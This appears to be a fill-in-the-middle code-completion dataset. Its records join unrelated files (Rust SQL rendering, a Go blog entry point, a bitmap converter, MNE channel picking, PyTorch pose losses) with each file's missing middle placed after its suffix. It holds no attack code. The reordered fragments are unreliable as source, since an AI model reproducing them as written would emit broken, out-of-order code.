(DefaultValue::NOW, _) => unreachable!("NOW default on non-datetime column"),
(DefaultValue::VALUE(val), ColumnTypeFamily::DateTime) => format!("'{}'", val).into(),
(DefaultValue::VALUE(val), _) => format!("{}", val).into(),
(DefaultValue::SEQUENCE(_), _) => unreachable!("rendering of sequence defaults"),
}
}
}
impl SqliteRenderer {
fn render_column_type(&self, t: &ColumnType) -> String {
match &t.family {
ColumnTypeFamily::Boolean => format!("BOOLEAN"),
ColumnTypeFamily::DateTime => format!("DATE"),
ColumnTypeFamily::Float => format!("REAL"),
ColumnTypeFamily::Int => format!("INTEGER"),
ColumnTypeFamily::String => format!("TEXT"),
x => unimplemented!("{:?} not handled yet", x),
}
}
}
fn escape_quotes(s: &str) -> Cow<'_, str> {
 static STRING_LITERAL_CHARACTER_TO_ESCAPE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"'"#).unwrap());
STRING_LITERAL_CHARACTER_TO_ESCAPE_RE.replace_all(s, "'$0")
}
| render_default |
main.rs | use std::{env, process};
mod lib;
use lib::Config;
fn | () {
let args: Vec<String> = env::args().collect();
let config = Config::new(&args).unwrap_or_else(|err| {
eprintln!("Problem parsing arguments: {}", err);
process::exit(1);
});
if let Err(e) = lib::run(config) {
eprintln!("Application error: {}", e);
process::exit(1);
}
} | main |
stats_runner.py | import fix_paths
from models.author import Author
import basic_stats
from models.commit import Commit
import common
from models.file_diff import FileDiff
from models.hunk import Hunk
from models.patch import Patch
from collections import Counter, defaultdict
import pylab
import sqlalchemy
session = common.Session()
print 'Number of authors: %s' % (session.query(Author).count())
print 'Number of commits: %s' % (session.query(Commit).count())
# Max churn:
# select sum(lines_added),sum(lines_removed),sum(lines_added+lines_removed),new_file_path from hunks inner join file_diffs on hunks.file_diff_id = file_diffs.id group by new_file_path order by sum(lines_added+lines_removed);
def _print_histogram(histogram):
|
commit_counts = [count[0] for count in session.query(sqlalchemy.func.count(Commit.committer_email)).group_by(Commit.committer_email).all()]
author_counts = [count[0] for count in session.query(sqlalchemy.func.count(Commit.author_email)).group_by(Commit.author_email).all()]
pylab.figure()
pylab.hist([commit_counts, author_counts], 50, histtype='bar', color=['blue', 'yellow'], label=['Commit Counts', 'Authorship Counts'])
pylab.xlabel('Number of changes')
pylab.ylabel('Number of authors')
pylab.legend()
def remove_max(list):
list.remove(max(list))
return list
def detuple(list):
return [val[0] for val in list]
lines_added = remove_max(detuple(session.query(Patch.lines_added).all()))
lines_removed = remove_max(detuple(session.query(Patch.lines_removed).all()))
files_touched = remove_max(detuple(session.query(Patch.files_changed).all()))
pylab.figure()
pylab.hist([lines_added, lines_removed, files_touched], 50, histtype='bar', color=['blue', 'green', 'red'], label=['Lines Added', 'Lines Removed', 'Files Changed'], log=True)
pylab.legend()
lines_added_capped = filter(lambda x: x < 5000, lines_added)
lines_removed_capped = filter(lambda x: x < 5000, lines_removed)
files_touched_capped = filter(lambda x: x < 5000, files_touched)
pylab.figure()
pylab.hist([lines_added_capped , lines_removed_capped, files_touched_capped], 50, histtype='bar', color=['blue', 'green', 'red'], label=['Lines Added', 'Lines Removed', 'Files Changed'], log=True)
pylab.legend()
pylab.show()
| histogram_counts = [(count, len(values)) for count, values in histogram.iteritems()]
histogram_counts.sort(key=lambda key: key[0])
print histogram_counts |
bitmap_converter.py | #!/usr/bin/env python
'''This script converts from any image type supported by
Python imaging library to the RLE-encoded format used by
NxWidgets.
'''
from PIL import Image
def get_palette(img, maxcolors = 255):
'''Returns a list of colors. If there are too many colors in the image,
the least used are removed.
'''
img = img.convert("RGB")
colors = img.getcolors(65536)
colors.sort(key = lambda c: -c[0])
return [c[1] for c in colors[:maxcolors]]
def write_palette(outfile, palette):
'''Write the palette (normal and highlight) to the output file.'''
outfile.write('static const NXWidgets::nxwidget_pixel_t palette[BITMAP_PALETTESIZE] =\n');
outfile.write('{\n')
for i in range(0, len(palette), 4):
outfile.write(' ');
for r, g, b in palette[i:i+4]:
outfile.write('MKRGB(%3d,%3d,%3d), ' % (r, g, b))
outfile.write('\n');
outfile.write('};\n\n')
outfile.write('static const NXWidgets::nxwidget_pixel_t hilight_palette[BITMAP_PALETTESIZE] =\n');
outfile.write('{\n')
for i in range(0, len(palette), 4):
outfile.write(' ');
for r, g, b in palette[i:i+4]:
r = min(255, r + 50)
g = min(255, g + 50)
b = min(255, b + 50)
outfile.write('MKRGB(%3d,%3d,%3d), ' % (r, g, b))
outfile.write('\n');
outfile.write('};\n\n')
def quantize(color, palette):
'''Return the color index to closest match in the palette.'''
try:
return palette.index(color)
except ValueError:
# No exact match, search for the closest
def distance(color2):
return sum([(a - b)**2 for a, b in zip(color, color2)])
return palette.index(min(palette, key = distance));
def encode_row(img, palette, y):
'''RLE-encode one row of image data.'''
entries = []
color = None
repeats = 0
for x in range(0, img.size[0]):
c = quantize(img.getpixel((x, y)), palette)
if c == color and repeats < 255:
repeats += 1
else:
if color is not None:
entries.append((repeats, color))
repeats = 1
color = c
if color is not None:
entries.append((repeats, color))
return entries
def write_image(outfile, img, palette):
'''Write the image contents to the output file.'''
outfile.write('static const NXWidgets::SRlePaletteBitmapEntry bitmap[] =\n');
outfile.write('{\n');
for y in range(0, img.size[1]):
entries = encode_row(img, palette, y)
row = ""
for r, c in entries:
if len(row) > 60:
outfile.write(' ' + row + '\n')
row = ""
row += '{%3d, %3d}, ' % (r, c)
row += ' ' * (73 - len(row))
outfile.write(' ' + row + '/* Row %d */\n' % y)
outfile.write('};\n\n');
def write_descriptor(outfile, name):
'''Write the public descriptor structure for the image.'''
outfile.write('extern const struct NXWidgets::SRlePaletteBitmap g_%s =\n' % name)
outfile.write('{\n')
outfile.write(' CONFIG_NXWIDGETS_BPP,\n')
outfile.write(' CONFIG_NXWIDGETS_FMT,\n')
outfile.write(' BITMAP_PALETTESIZE,\n') | outfile.write(' BITMAP_HEIGHT,\n')
outfile.write(' {palette, hilight_palette},\n')
outfile.write(' bitmap\n')
outfile.write('};\n')
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 3:
print "Usage: bitmap_converter.py source.png output.cxx"
sys.exit(1)
img = Image.open(sys.argv[1]).convert("RGB")
outfile = open(sys.argv[2], 'w')
palette = get_palette(img)
outfile.write(
'''
 /* Automatically generated NuttX bitmap file. */
/* Generated from %(src)s by bitmap_converter.py. */
#include <nxconfig.hxx>
#include <crlepalettebitmap.hxx>
#define BITMAP_WIDTH %(width)s
#define BITMAP_HEIGHT %(height)s
#define BITMAP_PALETTESIZE %(palettesize)s
''' % {'src': sys.argv[1], 'width': img.size[0], 'height': img.size[1],
'palettesize': len(palette)}
)
name = os.path.splitext(os.path.basename(sys.argv[1]))[0]
write_palette(outfile, palette)
write_image(outfile, img, palette)
write_descriptor(outfile, name) | outfile.write(' BITMAP_WIDTH,\n') |
main.go | package main
import (
"pixiublog/jobs"
"pixiublog/models"
_ "pixiublog/routers"
"pixiublog/utils"
"time"
"github.com/astaxie/beego"
)
func init() {
 // Initialize the data models
var StartTime = time.Now().Unix()
models.Init(StartTime)
jobs.InitJobs()
}
func main() {
 // Add custom template functions
addTemplateFunc()
beego.Run()
}
func addTemplateFunc() {
beego.AddFunc | ils.NumEq)
beego.AddFuncMap("ModEq", utils.ModEq)
beego.AddFuncMap("ContainNum", utils.ContainNum)
beego.AddFuncMap("RandNum", utils.RandNum)
beego.AddFuncMap("Add", utils.Add)
}
| Map("NumEq", ut |
pick.py | # Authors: Alexandre Gramfort <[email protected]>
# Matti Hamalainen <[email protected]>
# Martin Luessi <[email protected]>
#
# License: BSD (3-clause)
from copy import deepcopy
import re
import numpy as np
from .constants import FIFF
from ..utils import logger, verbose
from ..externals.six import string_types
def channel_type(info, idx):
"""Get channel type.
Parameters
----------
info : dict
Measurement info
idx : int
Index of channel
Returns
-------
type : 'grad' | 'mag' | 'eeg' | 'stim' | 'eog' | 'emg' | 'ecg'
'ref_meg' | 'resp' | 'exci' | 'ias' | 'syst' | 'misc'
'seeg' | 'bio' | 'chpi' | 'dipole' | 'gof' | 'ecog' | 'hbo' | 'hbr'
Type of channel
"""
kind = info['chs'][idx]['kind']
if kind == FIFF.FIFFV_MEG_CH:
if info['chs'][idx]['unit'] == FIFF.FIFF_UNIT_T_M:
return 'grad'
elif info['chs'][idx]['unit'] == FIFF.FIFF_UNIT_T:
return 'mag'
elif kind == FIFF.FIFFV_REF_MEG_CH:
return 'ref_meg'
elif kind == FIFF.FIFFV_EEG_CH:
return 'eeg'
elif kind == FIFF.FIFFV_STIM_CH:
return 'stim'
elif kind == FIFF.FIFFV_EOG_CH:
return 'eog'
elif kind == FIFF.FIFFV_EMG_CH:
return 'emg'
elif kind == FIFF.FIFFV_ECG_CH:
return 'ecg'
elif kind == FIFF.FIFFV_RESP_CH:
return 'resp'
elif kind == FIFF.FIFFV_MISC_CH:
return 'misc'
elif kind == FIFF.FIFFV_EXCI_CH:
return 'exci'
elif kind == FIFF.FIFFV_IAS_CH:
return 'ias'
elif kind == FIFF.FIFFV_SYST_CH:
return 'syst'
elif kind == FIFF.FIFFV_SEEG_CH:
return 'seeg'
elif kind == FIFF.FIFFV_BIO_CH:
return 'bio'
elif kind in [FIFF.FIFFV_QUAT_0, FIFF.FIFFV_QUAT_1, FIFF.FIFFV_QUAT_2,
FIFF.FIFFV_QUAT_3, FIFF.FIFFV_QUAT_4, FIFF.FIFFV_QUAT_5,
FIFF.FIFFV_QUAT_6, FIFF.FIFFV_HPI_G, FIFF.FIFFV_HPI_ERR,
FIFF.FIFFV_HPI_MOV]:
return 'chpi' # channels relative to head position monitoring
elif kind == FIFF.FIFFV_DIPOLE_WAVE:
return 'dipole'
elif kind == FIFF.FIFFV_GOODNESS_FIT:
return 'gof'
elif kind == FIFF.FIFFV_ECOG_CH:
return 'ecog'
elif kind == FIFF.FIFFV_FNIRS_CH:
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBO:
return 'hbo'
elif info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBR:
return 'hbr'
raise Exception('Unknown channel type')
def pick_channels(ch_names, include, exclude=[]):
"""Pick channels by names.
Returns the indices of the good channels in ch_names.
Parameters
----------
ch_names : list of string
List of channels.
include : list of string
List of channels to include (if empty include all available).
.. note:: This is to be treated as a set. The order of this list
is not used or maintained in ``sel``.
exclude : list of string
List of channels to exclude (if empty do not exclude any channel).
Defaults to [].
See Also
--------
pick_channels_regexp, pick_types
Returns
-------
sel : array of int
Indices of good channels.
"""
if len(np.unique(ch_names)) != len(ch_names):
raise RuntimeError('ch_names is not a unique list, picking is unsafe')
_check_excludes_includes(include)
_check_excludes_includes(exclude)
if not isinstance(include, set):
include = set(include)
if not isinstance(exclude, set):
exclude = set(exclude)
sel = []
for k, name in enumerate(ch_names):
if (len(include) == 0 or name in include) and name not in exclude:
sel.append(k)
return np.array(sel, int)
def pick_channels_regexp(ch_names, regexp):
"""Pick channels using regular expression.
Returns the indices of the good channels in ch_names.
Parameters
----------
ch_names : list of string
List of channels
regexp : string
The regular expression. See python standard module for regular
expressions.
Returns
-------
sel : array of int
Indices of good channels.
See Also
--------
pick_channels
Examples
--------
>>> pick_channels_regexp(['MEG 2331', 'MEG 2332', 'MEG 2333'], 'MEG ...1')
[0]
>>> pick_channels_regexp(['MEG 2331', 'MEG 2332', 'MEG 2333'], 'MEG *')
[0, 1, 2]
"""
r = re.compile(regexp)
return [k for k, name in enumerate(ch_names) if r.match(name)]
def _triage_meg_pick(ch, meg):
"""Triage an MEG pick type."""
if meg is True:
return True
elif ch['unit'] == FIFF.FIFF_UNIT_T_M:
if meg == 'grad':
return True
elif meg == 'planar1' and ch['ch_name'].endswith('2'):
return True
elif meg == 'planar2' and ch['ch_name'].endswith('3'):
return True
elif (meg == 'mag' and ch['unit'] == FIFF.FIFF_UNIT_T):
return True
return False
def _triage_fnirs_pick(ch, fnirs):
"""Triage an fNIRS pick type."""
if fnirs is True:
return True
elif ch['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBO and fnirs == 'hbo':
return True
elif ch['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBR and fnirs == 'hbr':
return True
return False
def _check_meg_type(meg, allow_auto=False):
"""Ensure a valid meg type."""
if isinstance(meg, string_types):
allowed_types = ['grad', 'mag', 'planar1', 'planar2']
allowed_types += ['auto'] if allow_auto else []
if meg not in allowed_types:
raise ValueError('meg value must be one of %s or bool, not %s'
% (allowed_types, meg))
def pick_types(info, meg=True, eeg=False, stim=False, eog=False, ecg=False,
emg=False, ref_meg='auto', misc=False, resp=False, chpi=False,
exci=False, ias=False, syst=False, seeg=False, dipole=False,
gof=False, bio=False, ecog=False, fnirs=False, include=(),
exclude='bads', selection=None):
"""Pick channels by type and names.
Parameters
----------
info : dict
The measurement info.
meg : bool | str
 If True include all MEG channels. If False include none.
 If a string, it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg: bool | str
If True include CTF / 4D reference channels. If 'auto', the reference
channels are only included if compensations are present. Can also be
the string options from `meg`.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can be
'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
include : list of string
List of additional channels to include. If empty do not include any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
Returns
-------
sel : array of int
Indices of good channels.
"""
# NOTE: Changes to this function's signature should also be changed in
# PickChannelsMixin
from .meas_info import Info
if not isinstance(info, Info):
raise TypeError('info must be an instance of Info, not %s'
% type(info))
info._check_consistency()
nchan = info['nchan']
pick = np.zeros(nchan, dtype=np.bool)
if exclude is None:
raise ValueError('exclude must be a list of strings or "bads"')
elif exclude == 'bads':
exclude = info.get('bads', [])
elif not isinstance(exclude, (list, tuple)):
raise ValueError('exclude must either be "bads" or a list of strings.'
' If only one channel is to be excluded, use '
'[ch_name] instead of passing ch_name.')
_check_meg_type(ref_meg, allow_auto=True)
_check_meg_type(meg)
if isinstance(ref_meg, string_types) and ref_meg == 'auto':
ref_meg = ('comps' in info and info['comps'] is not None and
len(info['comps']) > 0)
for param in (eeg, stim, eog, ecg, emg, misc, resp, chpi, exci,
ias, syst, seeg, dipole, gof, bio, ecog):
if not isinstance(param, bool):
w = ('Parameters for all channel types (with the exception '
'of "meg", "ref_meg" and "fnirs") must be of type bool, '
'not {0}.')
raise ValueError(w.format(type(param)))
for k in range(nchan):
kind = info['chs'][k]['kind']
# XXX eventually we should de-duplicate this with channel_type!
if kind == FIFF.FIFFV_MEG_CH and meg:
pick[k] = _triage_meg_pick(info['chs'][k], meg)
elif kind == FIFF.FIFFV_EEG_CH and eeg:
pick[k] = True
elif kind == FIFF.FIFFV_STIM_CH and stim:
pick[k] = True
elif kind == FIFF.FIFFV_EOG_CH and eog:
pick[k] = True
elif kind == FIFF.FIFFV_ECG_CH and ecg:
pick[k] = True
elif kind == FIFF.FIFFV_EMG_CH and emg:
pick[k] = True
elif kind == FIFF.FIFFV_MISC_CH and misc:
pick[k] = True
elif kind == FIFF.FIFFV_REF_MEG_CH and ref_meg:
pick[k] = _triage_meg_pick(info['chs'][k], ref_meg)
elif kind == FIFF.FIFFV_RESP_CH and resp:
pick[k] = True
elif kind == FIFF.FIFFV_SYST_CH and syst:
pick[k] = True
elif kind == FIFF.FIFFV_SEEG_CH and seeg:
pick[k] = True
elif kind == FIFF.FIFFV_IAS_CH and ias:
pick[k] = True
elif kind == FIFF.FIFFV_EXCI_CH and exci:
pick[k] = True
elif kind in [FIFF.FIFFV_QUAT_0, FIFF.FIFFV_QUAT_1, FIFF.FIFFV_QUAT_2,
FIFF.FIFFV_QUAT_3, FIFF.FIFFV_QUAT_4, FIFF.FIFFV_QUAT_5,
FIFF.FIFFV_QUAT_6, FIFF.FIFFV_HPI_G, FIFF.FIFFV_HPI_ERR,
FIFF.FIFFV_HPI_MOV] and chpi:
pick[k] = True
elif kind == FIFF.FIFFV_DIPOLE_WAVE and dipole:
pick[k] = True
elif kind == FIFF.FIFFV_GOODNESS_FIT and gof:
pick[k] = True
elif kind == FIFF.FIFFV_BIO_CH and bio:
pick[k] = True
elif kind == FIFF.FIFFV_ECOG_CH and ecog:
pick[k] = True
elif kind == FIFF.FIFFV_FNIRS_CH:
pick[k] = _triage_fnirs_pick(info['chs'][k], fnirs)
# restrict channels to selection if provided
if selection is not None:
# the selection only restricts these types of channels
sel_kind = [FIFF.FIFFV_MEG_CH, FIFF.FIFFV_REF_MEG_CH,
FIFF.FIFFV_EEG_CH]
for k in np.where(pick)[0]:
if (info['chs'][k]['kind'] in sel_kind and
info['ch_names'][k] not in selection):
pick[k] = False
myinclude = [info['ch_names'][k] for k in range(nchan) if pick[k]]
myinclude += include
if len(myinclude) == 0:
sel = np.array([], int)
else:
sel = pick_channels(info['ch_names'], myinclude, exclude)
return sel
def pick_info(info, sel=(), copy=True):
"""Restrict an info structure to a selection of channels.
Parameters
----------
info : dict
Info structure from evoked or raw data.
sel : list of int | None
Indices of channels to include.
copy : bool
If copy is False, info is modified inplace.
Returns
-------
res : dict
Info structure restricted to a selection of channels.
"""
info._check_consistency()
info = info.copy() if copy else info
if sel is None:
return info
elif len(sel) == 0:
raise ValueError('No channels match the selection.')
info['chs'] = [info['chs'][k] for k in sel]
info._update_redundant()
info['bads'] = [ch for ch in info['bads'] if ch in info['ch_names']]
comps = deepcopy(info['comps'])
for c in comps:
row_idx = [k for k, n in enumerate(c['data']['row_names'])
if n in info['ch_names']]
row_names = [c['data']['row_names'][i] for i in row_idx]
rowcals = c['rowcals'][row_idx]
c['rowcals'] = rowcals
c['data']['nrow'] = len(row_names)
c['data']['row_names'] = row_names
c['data']['data'] = c['data']['data'][row_idx]
info['comps'] = comps
info._check_consistency()
return info
def _has_kit_refs(info, picks):
"""Determine if KIT ref channels are chosen.
This is currently only used by make_forward_solution, which cannot
run when KIT reference channels are included.
"""
for p in picks:
if info['chs'][p]['coil_type'] == FIFF.FIFFV_COIL_KIT_REF_MAG:
return True
return False
def pick_channels_evoked(orig, include=[], exclude='bads'):
"""Pick channels from evoked data.
Parameters
----------
orig : Evoked object
One evoked dataset.
include : list of string, (optional)
List of channels to include (if empty, include all available).
exclude : list of string | str
List of channels to exclude. If empty do not exclude any (default).
If 'bads', exclude channels in orig.info['bads']. Defaults to 'bads'.
Returns
-------
res : instance of Evoked
Evoked data restricted to selected channels. If include and
exclude are empty it returns orig without copy.
"""
if len(include) == 0 and len(exclude) == 0:
return orig
exclude = _check_excludes_includes(exclude, info=orig.info,
allow_bads=True)
sel = pick_channels(orig.info['ch_names'], include=include,
exclude=exclude)
if len(sel) == 0:
raise ValueError('Warning : No channels match the selection.')
res = deepcopy(orig)
#
# Modify the measurement info
#
res.info = pick_info(res.info, sel)
#
# Create the reduced data set
#
res.data = res.data[sel, :]
return res
@verbose
def pick_channels_forward(orig, include=[], exclude=[], verbose=None):
"""Pick channels from forward operator.
Parameters
----------
orig : dict
A forward solution.
include : list of string
List of channels to include (if empty, include all available).
Defaults to [].
exclude : list of string | 'bads'
Channels to exclude (if empty, do not exclude any). Defaults to [].
If 'bads', then exclude bad channels in orig.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
res : dict
Forward solution restricted to selected channels. If include and
exclude are empty it returns orig without copy.
"""
orig['info']._check_consistency()
if len(include) == 0 and len(exclude) == 0:
return orig
exclude = _check_excludes_includes(exclude,
info=orig['info'], allow_bads=True)
# Allow for possibility of channel ordering in forward solution being
# different from that of the M/EEG file it is based on.
sel_sol = pick_channels(orig['sol']['row_names'], include=include,
exclude=exclude)
sel_info = pick_channels(orig['info']['ch_names'], include=include,
exclude=exclude)
fwd = deepcopy(orig)
# Check that forward solution and original data file agree on #channels
if len(sel_sol) != len(sel_info):
raise ValueError('Forward solution and functional data appear to '
'have different channel names, please check.')
# Do we have something?
nuse = len(sel_sol)
if nuse == 0:
raise ValueError('Nothing remains after picking')
logger.info(' %d out of %d channels remain after picking'
% (nuse, fwd['nchan']))
# Pick the correct rows of the forward operator using sel_sol
fwd['sol']['data'] = fwd['sol']['data'][sel_sol, :]
fwd['_orig_sol'] = fwd['_orig_sol'][sel_sol, :]
fwd['sol']['nrow'] = nuse
ch_names = [fwd['sol']['row_names'][k] for k in sel_sol]
fwd['nchan'] = nuse
fwd['sol']['row_names'] = ch_names
# Pick the appropriate channel names from the info-dict using sel_info
fwd['info']['chs'] = [fwd['info']['chs'][k] for k in sel_info]
fwd['info']._update_redundant()
fwd['info']['bads'] = [b for b in fwd['info']['bads'] if b in ch_names]
if fwd['sol_grad'] is not None:
fwd['sol_grad']['data'] = fwd['sol_grad']['data'][sel_sol, :]
fwd['_orig_sol_grad'] = fwd['_orig_sol_grad'][sel_sol, :]
fwd['sol_grad']['nrow'] = nuse
fwd['sol_grad']['row_names'] = [fwd['sol_grad']['row_names'][k]
for k in sel_sol]
return fwd
def pick_types_forward(orig, meg=True, eeg=False, ref_meg=True, seeg=False,
ecog=False, include=[], exclude=[]):
"""Pick by channel type and names from a forward operator.
Parameters
----------
orig : dict
A forward solution
meg : bool or string
 If True include all MEG channels. If False include none.
 If a string, it can be 'mag' or 'grad' to select only magnetometers
 or gradiometers.
eeg : bool
If True include EEG channels
ref_meg : bool
If True include CTF / 4D reference channels
seeg : bool
If True include stereotactic EEG channels
ecog : bool
If True include electrocorticography channels
include : list of string
List of additional channels to include. If empty do not include any.
exclude : list of string | str
List of channels to exclude. If empty do not exclude any (default).
If 'bads', exclude channels in orig['info']['bads'].
Returns
-------
res : dict
Forward solution restricted to selected channel types.
"""
info = orig['info']
sel = pick_types(info, meg, eeg, ref_meg=ref_meg, seeg=seeg, ecog=ecog,
include=include, exclude=exclude)
if len(sel) == 0:
raise ValueError('No valid channels found')
include_ch_names = [info['ch_names'][k] for k in sel]
return pick_channels_forward(orig, include_ch_names)
def channel_indices_by_type(info):
"""Get indices of channels by type."""
idx = dict((key, list()) for key in _PICK_TYPES_KEYS if
key not in ('meg', 'fnirs'))
idx.update(mag=list(), grad=list(), hbo=list(), hbr=list())
for k, ch in enumerate(info['chs']):
for key in idx.keys():
if channel_type(info, k) == key:
idx[key].append(k)
return idx
def pick_channels_cov(orig, include=[], exclude='bads'):
"""Pick channels from covariance matrix.
Parameters
----------
orig : Covariance
A covariance.
include : list of string, (optional)
List of channels to include (if empty, include all available).
exclude : list of string, (optional) | 'bads'
Channels to exclude (if empty, do not exclude any). Defaults to 'bads'.
Returns
-------
res : dict
Covariance solution restricted to selected channels.
"""
from ..cov import Covariance
exclude = orig['bads'] if exclude == 'bads' else exclude
sel = pick_channels(orig['names'], include=include, exclude=exclude)
data = orig['data'][sel][:, sel] if not orig['diag'] else orig['data'][sel]
names = [orig['names'][k] for k in sel]
bads = [name for name in orig['bads'] if name in orig['names']]
res = Covariance(
data=data, names=names, bads=bads, projs=deepcopy(orig['projs']),
nfree=orig['nfree'], eig=None, eigvec=None,
method=orig.get('method', None), loglik=orig.get('loglik', None))
return res
def _picks_by_type(info, meg_combined=False, ref_meg=False, exclude='bads'):
"""Get data channel indices as separate list of tuples.
Parameters
----------
 info : instance of mne.measurement_info.Info
The info.
meg_combined : bool
Whether to return combined picks for grad and mag.
ref_meg : bool
If True include CTF / 4D reference channels
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in info['bads'].
Returns
-------
picks_list : list of tuples
The list of tuples of picks and the type string.
"""
from ..channels.channels import _contains_ch_type
picks_list = []
has_mag, has_grad, has_eeg = [_contains_ch_type(info, k)
for k in ('mag', 'grad', 'eeg')]
if has_mag and (meg_combined is not True or not has_grad):
picks_list.append(
('mag', pick_types(info, meg='mag', eeg=False, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
if has_grad and (meg_combined is not True or not has_mag):
picks_list.append(
('grad', pick_types(info, meg='grad', eeg=False, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
if has_mag and has_grad and meg_combined is True:
picks_list.append(
('meg', pick_types(info, meg=True, eeg=False, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
if has_eeg:
picks_list.append(
('eeg', pick_types(info, meg=False, eeg=True, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
return picks_list
def _check_excludes_includes(chs, info=None, allow_bads=False):
"""Ensure that inputs to exclude/include are list-like or "bads".
Parameters
----------
chs : any input, should be list, tuple, string
The channels passed to include or exclude.
allow_bads : bool
Allow the user to supply "bads" as a string for auto exclusion.
Returns
-------
chs : list
 Channels to be included/excluded. If allow_bads, and chs=="bads",
this will be the bad channels found in 'info'.
"""
from .meas_info import Info | raise ValueError('Supply an info object if allow_bads is true')
elif chs != 'bads':
raise ValueError('If chs is a string, it must be "bads"')
else:
chs = info['bads']
else:
raise ValueError(
'include/exclude must be list, tuple, ndarray, or "bads". ' +
'You provided type {0}'.format(type(chs)))
return chs
_PICK_TYPES_DATA_DICT = dict(
meg=True, eeg=True, stim=False, eog=False, ecg=False, emg=False,
misc=False, resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=True, dipole=False, gof=False, bio=False, ecog=True, fnirs=True)
_PICK_TYPES_KEYS = tuple(list(_PICK_TYPES_DATA_DICT.keys()) + ['ref_meg'])
_DATA_CH_TYPES_SPLIT = ['mag', 'grad', 'eeg', 'seeg', 'ecog', 'hbo', 'hbr']
# Valid data types, ordered for consistency, used in viz/evoked.
_VALID_CHANNEL_TYPES = ['eeg', 'grad', 'mag', 'seeg', 'eog', 'ecg', 'emg',
'dipole', 'gof', 'bio', 'ecog', 'hbo', 'hbr',
'misc']
def _pick_data_channels(info, exclude='bads', with_ref_meg=True):
"""Pick only data channels."""
return pick_types(info, ref_meg=with_ref_meg, include=[], exclude=exclude,
selection=None, **_PICK_TYPES_DATA_DICT)
def _pick_aux_channels(info, exclude='bads'):
"""Pick only auxiliary channels.
Corresponds to EOG, ECG, EMG and BIO
"""
return pick_types(info, meg=False, eog=True, ecg=True, emg=True, bio=True,
ref_meg=False, exclude=exclude)
def _pick_data_or_ica(info):
"""Pick only data or ICA channels."""
ch_names = [c['ch_name'] for c in info['chs']]
if 'ICA ' in ','.join(ch_names):
picks = pick_types(info, exclude=[], misc=True)
else:
picks = _pick_data_channels(info, exclude=[], with_ref_meg=True)
return picks | if not isinstance(chs, (list, tuple, np.ndarray)):
if allow_bads is True:
if not isinstance(info, Info): |
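A hedged usage sketch of pick_channels above (pure name matching, no Info object involved; assumes this module is importable and numpy is installed):
names = ['MEG 0113', 'EEG 001', 'STI 014']
print(pick_channels(names, include=[], exclude=['STI 014']))  # [0 1]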
params_loss.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import time
import pickle
import numpy as np
import config
import constants
from config import args
from utils import batch_rodrigues, rotation_matrix_to_angle_axis
def batch_l2_loss(real,predict):
loss_batch = torch.norm(real-predict, p=2, dim=1)
return loss_batch.mean()
def batch_l2_loss_param(real,predict):
 # convert to rotation matrices: different axis-angle parameters can map to the same rotation, so compare in rotation-matrix space.
batch_size = real.shape[0]
real = batch_rodrigues(real.reshape(-1,3)).contiguous()#(N*J)*3 -> (N*J)*3*3
predict = batch_rodrigues(predict.reshape(-1,3)).contiguous()#(N*J)*3 -> (N*J)*3*3
loss = torch.norm((real-predict).view(-1,9), p=2, dim=-1)#self.sl1loss(real,predict)#
loss = loss.reshape(batch_size, -1).mean(-1)
return loss
def _calc_MPJAE(rel_pose_pred,rel_pose_real):
global_pose_rotmat_pred = trans_relative_rot_to_global_rotmat(rel_pose_pred, with_global_rot=True)
global_pose_rotmat_real = trans_relative_rot_to_global_rotmat(rel_pose_real, with_global_rot=True)
MPJAE_error = _calc_joint_angle_error(global_pose_rotmat_pred, global_pose_rotmat_real).cpu().numpy()
return MPJAE_error
def trans_relative_rot_to_global_rotmat(params, with_global_rot=False):
'''
calculate absolute rotation matrix in the global coordinate frame of K body parts.
The rotation is the map from the local bone coordinate frame to the global one.
K= 9 parts in the following order:
root (JOINT 0) , left hip (JOINT 1), right hip (JOINT 2), left knee (JOINT 4), right knee (JOINT 5),
left shoulder (JOINT 16), right shoulder (JOINT 17), left elbow (JOINT 18), right elbow (JOINT 19).
parent kinetic tree [-1, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 9, 12, 13, 14, 16, 17, 18, 19, 20, 21]
'''
batch_size, param_num = params.shape[0], params.shape[1]//3
pose_rotmat = batch_rodrigues(params.reshape(-1,3)).view(batch_size, param_num, 3, 3).contiguous()
if with_global_rot:
sellect_joints = np.array([0,1,2,4,5,16,17,18,19],dtype=np.int)
results = [pose_rotmat[:, 0]]
for idx in range(param_num-1):
i_val = int(idx + 1)
joint_rot = pose_rotmat[:, i_val]
parent = constants.kintree_parents[i_val]
glob_transf_mat = torch.matmul(results[parent], joint_rot)
results.append(glob_transf_mat)
else:
